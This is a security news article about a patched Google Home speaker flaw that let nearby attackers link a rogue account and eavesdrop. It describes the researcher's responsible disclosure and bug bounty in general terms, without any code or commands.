Security
Headlines
HeadlinesLatestCVEs

Headline

Google Home Vulnerability: Eavesdropping on Conversations

By Deeba Ahmed The issue was caused by the software architecture used in Google Home devices. This is a post from HackRead.com Read the original post: Google Home Vulnerability: Eavesdropping on Conversations

HackRead
#vulnerability#android#apple#google#amazon#backdoor#auth#wifi

Matt Kunze, an ethical hacker, reported wiretapping bugs in Google Home Smart Speakers, for which he received a bug bounty worth $107,500.

Google Assistant is currently more popular among smart homeowners than Amazon Alexa and Apple Siri, given its superior intuitiveness and capability to conduct lengthy conversations. However, according to the latest research, a vulnerability in Google Home Smart speakers could allow attackers to control the smart device and eavesdrop on user conversations indoors.

Findings Details

The vulnerability was identified by Matt Kunze, a security researcher using the moniker DownrightNifty Matt. The researchers revealed that if exploited, the vulnerability could allow the installation of backdoors and convert Google Home Smart speakers into wiretapping devices. Moreover, Google fixed the issue in April 2021 following responsible disclosure on 8 January 2021 and developing a Proof-of-Concept for the company.

Possible Dangers

The vulnerability could let an adversary present within the device’s wireless proximity install a backdoor account on the device and start sending remote commands, access the microphone feed, and initiate arbitrary HTTP requests. All of this could be possible if the attacker is within the user’s LAN range because making malicious requests exposes the Wi-Fi password of the device and provides the attacker direct access to all devices connected to the network.

What Caused the Issue?

Matt discovered that the problem was caused by the software architecture used in Google Home devices as it let an adversary add a rogue Google user account to their target’s smart home devices.

A threat actor would trick the individual into installing a malicious Android application to make the attack work. It will detect a Google Home automation device connected to the network and stealthily start issuing HTTP requests to link the threat actor’s account to the victim’s device.

In addition, the attacker could stage a Wi-Fi de-authentication attack to disconnect the Google Home device from the network and force the appliance to initiate a setup mode and create an open Wi-Fi network. Subsequently, the attacker can connect to this network and request additional details such as device name, certificate, and cloud_device_id. They could use the information and connect their account to the victim’s device.

According to Matt’s blog post, the attacker could perform a range of functions, such as turning the speaker’s volume down to zero and making calls to any phone number apart from spying on the victim via the microphone. The victim won’t suspect anything because just the device’s LED turns blue when the exploitation happens, and the user would think the firmware is being updated.

Matt successfully connected an unknown user account to a Google Home speaker. He created a backdoor account on the targeted device and obtained unprecedented privileges that let him send remote commands to the Home mini smart speaker, access its microphone feed, etc. Watch the demo shared by the researcher:

It is worth noting that there’s no evidence this security loophole was misused since its detection in 2021. Being an ethical hacker, the researcher notified Google about the issue, and it was patched. Matt received a bug bounty worth $107,500 for detecting this security flaw.

  1. Google Home Mini Secretly Recorded Conversations
  2. Voice assistant devices manipulated with ultrasonic waves
  3. Comcast voice remote control could be turned into a spying tool
  4. Using laser on Alexa and Google home to unlock your front door
  5. DolphinAttack: Voice Assistant Apps Siri and Alexa Can Be Hacked

HackRead: Latest News

Google’s Gemini AI Chatbot Keeps Telling Users to Die